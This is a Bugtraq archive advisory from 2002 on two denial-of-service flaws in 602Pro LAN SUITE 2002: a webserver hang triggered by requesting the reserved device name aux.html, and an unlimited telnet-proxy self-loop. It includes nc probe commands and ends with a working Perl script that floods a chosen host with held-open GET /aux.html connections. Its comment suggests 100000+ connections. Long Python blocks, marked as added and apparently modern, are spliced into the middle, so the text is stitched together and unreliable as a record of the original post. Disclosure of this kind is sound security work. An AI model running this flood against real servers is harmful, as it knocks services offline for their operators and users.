Bugtraq mailing list archives

[UPDATED] Advisory: Multiple 602Pro LAN SUITE 2002 Denial of Service Attacks


From: Stan Bubrouski <stan () ccs neu edu>
Date: Thu, 22 Aug 2002 10:28:22 -0400

Date: August 3, 2002 (Updated August 20, 2002)
Author: Stan Bubrouski
Product: 602Pro LAN SUITE 2002
Version: 2002
Vendor: Software602, Inc.
Summary: Denial of Service attacks in webserver and telnet proxy

Updates:

Description: There are two denial of service vulnerabilities
in 602Pro LAN SUITE 2002 for Windows.  The problems
are described below.  I've once again attached an
exploit for the webserver DoS out of sheer frustration.

Problem 1: Webserver/Webmail Windows device name DoS attack

This problem is NOT FIXED.  The person from
Software602 who responded to my advisory completely
lacks an understanding of how Windows device names work,
and as a result this problem still affects about
50%+ of all their users (using Netcraft as a source).

Response from developer:
"1. AUX has been filtered for a long time.
  AUX.HTML is not a problem because of the extension (no aux.html device
exists)."

As you can see, the developer does not understand
that on most Windows platforms aux.<anything> or
con.<anything> names the same device as AUX or CON
respectively: the reserved device name is recognised
before the extension is even considered.  To prove
this I used a harmless method of testing this problem
against sites listed on Netcraft as running Web602.
Here is an example of a non-vulnerable host:

$ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].com 80
HTTP/1.1 404 The file requested was not found
Server: WEB602/1.04
Content-Type: text/html
Content-Length: 111

Notice the Content-Length is 111; this is the length
of the built-in 404 error message.  BTW, using HEAD
does not exhibit the problem; only GET requests do,
which is what makes HEAD a safe way to check a host.
Now let's look at a vulnerable host:

$ printf "HEAD /aux.html HTTP/1.0\n\n" | nc www.[censored].net 80
HTTP/1.1 200 OK
Server: WEB602/1.04
Content-type: text/html
Content-length: 0
Connection: close

Notice the Content-Length is 0.  If I were to send a
GET request to that host for aux.html it would also
answer with Content-Length: 0, but the connection NEVER
closes; it doesn't even time out.  Doing this
repeatedly quickly and efficiently eats up memory
and CPU, which will not be released until the process
is killed.

This problem only seems to affect certain versions
of Windows.  Despite what the developers claim, it
is a problem, and I was able to find a couple hundred
vulnerable hosts using the HEAD method shown
above.  From the limited information I have from
having people personally test this, Win2k SP2/3 (EN)
seems vulnerable and Windows XP apparently does not.
As for other Windows OSs I can only speculate.  Either
it's the OS or a patch I do not have access to; either
way there is something wrong.
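The two checks above, written out as an added Python example (this is not code from the advisory or from Software602; the function names are mine): device_filter_blocks is the check the vendor's filter should have made, percent-decoding the path and stripping the extension before comparing against the Windows reserved device names, beside naive_filter_blocks, which compares the whole filename the way the developer's reply describes and therefore misses aux.html. classify_head_response applies the HEAD /aux.html fingerprint to the two responses captured above (transcribed from this advisory, hostnames censored there), and probe is an optional live version of the nc one-liner that sends HEAD only, so it does not trigger the hang.

```python
"""Reserved device name filtering and the HEAD /aux.html fingerprint.

Added example for the advisory above; not part of 602Pro LAN SUITE.
"""
import socket
from urllib.parse import unquote

# Names Win32 resolves to a device no matter which directory or
# extension surrounds them: aux.html, CON.txt and com1.log all open the
# device rather than a file.
RESERVED_DEVICES = frozenset(
    ["CON", "PRN", "AUX", "NUL"]
    + [f"COM{n}" for n in range(1, 10)]
    + [f"LPT{n}" for n in range(1, 10)]
)


def _filename(url_path: str) -> str:
    """Last path component, percent-decoded (so /%41UX.htm is AUX.htm)."""
    decoded = unquote(url_path.split("?", 1)[0])
    return decoded.replace("\\", "/").rsplit("/", 1)[-1]


def naive_filter_blocks(url_path: str) -> bool:
    """The filter the developer's reply describes: the whole filename
    must equal a device name, so "AUX" is caught but "aux.html" is not."""
    return _filename(url_path).upper() in RESERVED_DEVICES


def device_filter_blocks(url_path: str) -> bool:
    """Correct check: compare only the stem (text before the first dot,
    trailing spaces and dots removed), case-insensitively."""
    stem = _filename(url_path).split(".", 1)[0].rstrip(" .").upper()
    return stem in RESERVED_DEVICES


# Captured responses transcribed from the advisory.
NON_VULNERABLE_HEAD = (
    "HTTP/1.1 404 The file requested was not found\r\n"
    "Server: WEB602/1.04\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 111\r\n"
    "\r\n"
)
VULNERABLE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Server: WEB602/1.04\r\n"
    "Content-type: text/html\r\n"
    "Content-length: 0\r\n"
    "Connection: close\r\n"
    "\r\n"
)


def classify_head_response(raw: str) -> str:
    """Classify a reply to "HEAD /aux.html HTTP/1.0".

    404 with the 111-byte built-in error page means the name was looked
    up as an ordinary missing file.  200 OK with Content-Length 0 means
    the server opened the AUX device instead; a GET to that host hangs.
    Header names are matched case-insensitively (the two hosts differ).
    """
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    try:
        status = int(status_line.split(" ", 2)[1])
    except (IndexError, ValueError):
        return "unparseable"
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    if not headers.get("server", "").upper().startswith("WEB602"):
        return "not-web602"
    if status == 200 and headers.get("content-length") == "0":
        return "likely-vulnerable"
    if status == 404:
        return "not-vulnerable"
    return "unknown"


def probe(host: str, port: int = 80, timeout: float = 5.0) -> str:
    """Live version of the nc one-liner (HEAD only). Not run offline."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"HEAD /aux.html HTTP/1.0\r\n\r\n")
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return classify_head_response(data.decode("latin-1"))


if __name__ == "__main__":
    for p in ("/AUX", "/aux.html", "/docs/Con.txt", "/%41UX.htm", "/auxiliary.html"):
        print(f"{p:18} naive={naive_filter_blocks(p)!s:5} correct={device_filter_blocks(p)}")
    print(classify_head_response(NON_VULNERABLE_HEAD), classify_head_response(VULNERABLE_HEAD))
```

Run against a list of hosts, probe(host) gives the same three-way answer the advisory derives by eye from the nc output; only the HEAD method is used, so checking a host does not tie up one of its handlers.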

Problem 2: The telnet proxy is vulnerable to a DoS attack

The telnet proxy accepts localhost as a destination,
essentially allowing you to connect to the proxy
through the proxy itself, and it places no limit on
the number of such connections.

Response from developer:
"2. When you set up the IP filter (this is the only correct way of using
any proxy server!!!! no free service for anybody!!), then nobody else can
connect out through your telnet proxy...
The telnet proxy will be limited as per your notice. In "socksdll.ini" there will be a line
"TelnetMax=xxx" (where "xxx" will be the maximum number of connections)."

So this is (or will be) fixed in a new release.
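As an added example of the two fixes Problem 2 calls for (not code from 602Pro LAN SUITE, whose proxy is closed source; the class and function names and the socksdll.ini layout beyond the single TelnetMax= line quoted above are assumptions), the Python below models the accept decision a telnet proxy should make: refuse any destination that is the proxy host itself (loopback, the unspecified address, or one of its own addresses), so a client cannot chain the proxy back into its own listener, and enforce a connection cap read from a constructed socksdll.ini.

```python
"""Telnet proxy target policy: no self-connections, bounded connection count.

Added example for the advisory above; not part of 602Pro LAN SUITE.
"""
import ipaddress
from dataclasses import dataclass

# Constructed sample of socksdll.ini. Only the TelnetMax= line comes from
# the developer's reply; the section name and the other key are assumed.
SAMPLE_SOCKSDLL_INI = """\
[Telnet]
TelnetPort=23
TelnetMax=3
"""


def parse_telnet_max(ini_text: str, default: int = 0) -> int:
    """Return the TelnetMax value, or `default` (0 = unlimited, which is
    the behaviour the advisory complains about) when the line is absent."""
    for line in ini_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip().lower() == "telnetmax":
            try:
                return int(value.strip())
            except ValueError:
                break
    return default


@dataclass
class TelnetProxyPolicy:
    listen_port: int
    local_addresses: frozenset   # IP literals this host answers on
    telnet_max: int              # 0 means unlimited
    active: int = 0

    def is_self(self, dst_ip: str) -> bool:
        """True when a connection to dst_ip would land back on this host.
        Real code must resolve hostnames first and check every resulting
        address: a name that resolves to 127.0.0.1 is the same loop."""
        ip = ipaddress.ip_address(dst_ip)
        return ip.is_loopback or ip.is_unspecified or str(ip) in self.local_addresses

    def may_connect(self, dst_ip: str, dst_port: int) -> tuple:
        """Decide a client's connect request; on success a slot is taken."""
        if self.is_self(dst_ip):
            return False, "refused: target is the proxy host itself"
        if self.telnet_max and self.active >= self.telnet_max:
            return False, f"refused: TelnetMax={self.telnet_max} reached"
        self.active += 1
        return True, "ok"

    def release(self) -> None:
        """Free a slot when a proxied session ends."""
        if self.active > 0:
            self.active -= 1


def simulate_self_loop(policy: TelnetProxyPolicy, attempts: int) -> int:
    """How many attempts to proxy back into the proxy's own listener are
    accepted.  The advisory's proxy accepts every one; this policy none."""
    accepted = 0
    for _ in range(attempts):
        ok, _reason = policy.may_connect("127.0.0.1", policy.listen_port)
        accepted += ok
    return accepted


def make_policy(ini_text: str = SAMPLE_SOCKSDLL_INI) -> TelnetProxyPolicy:
    """Build a policy for an assumed proxy host at 192.0.2.10 listening on 23."""
    return TelnetProxyPolicy(
        listen_port=23,
        local_addresses=frozenset({"192.0.2.10"}),
        telnet_max=parse_telnet_max(ini_text),
    )


if __name__ == "__main__":
    policy = make_policy()
    print("self-loop attempts accepted:", simulate_self_loop(policy, 1000))
    for dst in ("198.51.100.7", "198.51.100.8", "198.51.100.9", "198.51.100.10"):
        print(dst, policy.may_connect(dst, 23))
```

The IP filter the developer points to decides who may use the proxy; the check above decides where it may go, and both are needed, since an authorised client on the LAN can still loop the proxy into itself without the self-target refusal.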

#!/usr/bin/perl
#
# lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS
#
# Note: Try using a connections setting of 100000+ for obvious results
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan () ccs neu edu)

use strict;
use warnings;
use IO::Socket;

if (@ARGV != 3) {
        print "Usage: $0 <hostname> <port> <connections>\n\n";
        exit 1;
}

my ($host, $port, $numc) = @ARGV;

# Each GET for the reserved device name aux.html leaves a server handler
# hung (200 OK, Content-length: 0, connection never closed), so the
# sockets are kept in @socks to hold the client side open as well.
my @socks;

foreach (1 .. $numc) {
        my $sock = IO::Socket::INET->new(
                PeerAddr => $host,
                PeerPort => $port,
                Proto    => 'tcp',
        );
        unless ($sock) {
                warn "connect to $host:$port failed: $@\n";
                next;
        }
        # Complete HTTP/1.0 request, terminating blank line included.
        print $sock "GET /aux.html HTTP/1.0\r\n\r\n";
        push @socks, $sock;
}

# Hold the connections open until interrupted (Ctrl-C).
sleep;

